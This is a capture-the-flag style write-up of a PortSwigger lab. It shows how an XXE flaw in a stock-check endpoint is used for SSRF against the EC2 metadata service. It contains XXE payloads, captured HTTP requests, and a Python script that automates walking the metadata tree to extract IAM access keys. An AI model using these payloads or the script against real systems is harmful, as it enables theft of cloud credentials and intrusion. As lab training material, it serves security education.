
PortSwigger: Exploiting XXE to perform SSRF attacks

Exploiting XXE to perform SSRF attacks

Solution

Open the lab: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1

Click "Check stock" on the product page and capture the request in Burp Proxy. The stock checker sends XML to /product/stock, so it is the candidate for XXE:
---
POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>

Check for XXE with a basic SSRF payload: declare an external entity pointing at the EC2 metadata endpoint (http://169.254.169.254/) and reference it in productId. If the parser resolves external entities, the fetched content is reflected in the productId error message, which turns the XXE into an SSRF with a readable response.

Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>
---
POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 186
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>

Get the server's IAM credentials: walk the metadata tree one level at a time, appending each name the previous response returned to the entity URL (latest, meta-data, iam, security-credentials, admin), until the entity resolves to the admin role's credentials document, which contains the SecretAccessKey.

POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 233
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>
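The walk above is done by hand, one request per level. The script below is an added example for this write-up, not part of the lab or PortSwigger's solution: it automates the same depth-first walk, sending one XXE payload per metadata node and parsing the reflected text. It assumes (not shown on the page) that the stock checker reflects the resolved entity in an error of the form "Invalid product ID: <content>" and that the metadata service behaves like EC2 IMDSv1 (directory listings are one bare name per line, a role's credentials are a JSON document). fake_send and FAKE_IMDS are a constructed stand-in for the lab backend so it runs offline; the key material in it is made up.

```python
import json
import re
from typing import Callable, Dict

IMDS = "http://169.254.169.254/"


def build_xxe_payload(url: str, store_id: int = 2) -> str:
    """Stock-check body with productId replaced by an external entity (same shape as the lab payload)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>\n'
        f"<stockCheck><productId>&xxe;</productId><storeId>{store_id}</storeId></stockCheck>"
    )


# Assumed reflection format: the app complains about the "product ID" it received.
ECHO_RE = re.compile(r"Invalid product ID:\s*(.*)", re.S)


class NotFound(Exception):
    """The metadata service had nothing at the requested path."""


def extract_echo(response_body: str) -> str:
    """Recover the entity's resolved text from the application's error message."""
    m = ECHO_RE.search(response_body)
    if m is None:
        raise ValueError("response did not reflect the entity: " + response_body[:80])
    return m.group(1).strip()


def fetch(send: Callable[[str], str], path: str) -> str:
    """One XXE round trip: POST the payload via `send`, return what the metadata service answered."""
    content = extract_echo(send(build_xxe_payload(IMDS + path)))
    if content.startswith("404"):
        raise NotFound(path)
    return content


def walk_metadata(send: Callable[[str], str], path: str = "", max_depth: int = 8) -> Dict[str, str]:
    """Depth-first walk, one XXE request per node; returns {path: leaf value}.

    JSON is a leaf. Any other text is tried as a listing; if descending into one of
    its lines gives 404, the text was a plain value (instance-id, hostname, ...).
    """
    content = fetch(send, path)
    if content.startswith("{") or max_depth == 0:
        return {path: content}
    leaves: Dict[str, str] = {}
    for name in content.splitlines():
        child = f"{path}/{name.rstrip('/')}" if path else name.rstrip("/")
        try:
            leaves.update(walk_metadata(send, child, max_depth - 1))
        except NotFound:
            return {path: content}
    return leaves


def parse_credentials(leaf: str) -> Dict[str, str]:
    """security-credentials/<role> is JSON holding the role's temporary keys."""
    doc = json.loads(leaf)
    return {k: doc[k] for k in ("AccessKeyId", "SecretAccessKey", "Token")}


# Constructed stand-in for the lab backend: resolves the entity URL against a fake
# metadata tree and reflects the result the way the vulnerable endpoint does.
FAKE_IMDS = {
    "latest": {
        "meta-data": {
            "instance-id": "i-0123456789abcdef0",
            "iam": {
                "security-credentials": {
                    "admin": json.dumps({
                        "AccessKeyId": "AKIAFAKEFAKEFAKEFAKE",  # made-up values
                        "SecretAccessKey": "fake/secret/key/for/the/example",
                        "Token": "fake-session-token",
                    })
                }
            },
        }
    }
}


def fake_send(xml_body: str) -> str:
    """Pretend to be POST /product/stock: pull the entity URL from the body and answer."""
    url = re.search(r'SYSTEM "([^"]+)"', xml_body).group(1)
    node = FAKE_IMDS
    for part in url[len(IMDS):].strip("/").split("/"):
        if part == "":
            continue  # root listing
        if not isinstance(node, dict) or part not in node:
            return "Invalid product ID: 404 - Not Found"
        node = node[part]
    if isinstance(node, dict):
        listing = "\n".join(k + ("/" if isinstance(v, dict) else "") for k, v in node.items())
        return "Invalid product ID: " + listing
    return "Invalid product ID: " + node


if __name__ == "__main__":
    found = walk_metadata(fake_send)
    print(parse_credentials(found["latest/meta-data/iam/security-credentials/admin"]))
```

Against the real lab, replace fake_send with a function that POSTs the body to /product/stock with the session cookie and returns the response text. Two caveats: the 404 heuristic costs one extra request per plain value, and the walk only works because the lab simulates IMDSv1; IMDSv2 requires a PUT with a token header first, which a plain XXE fetch cannot produce.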

Solved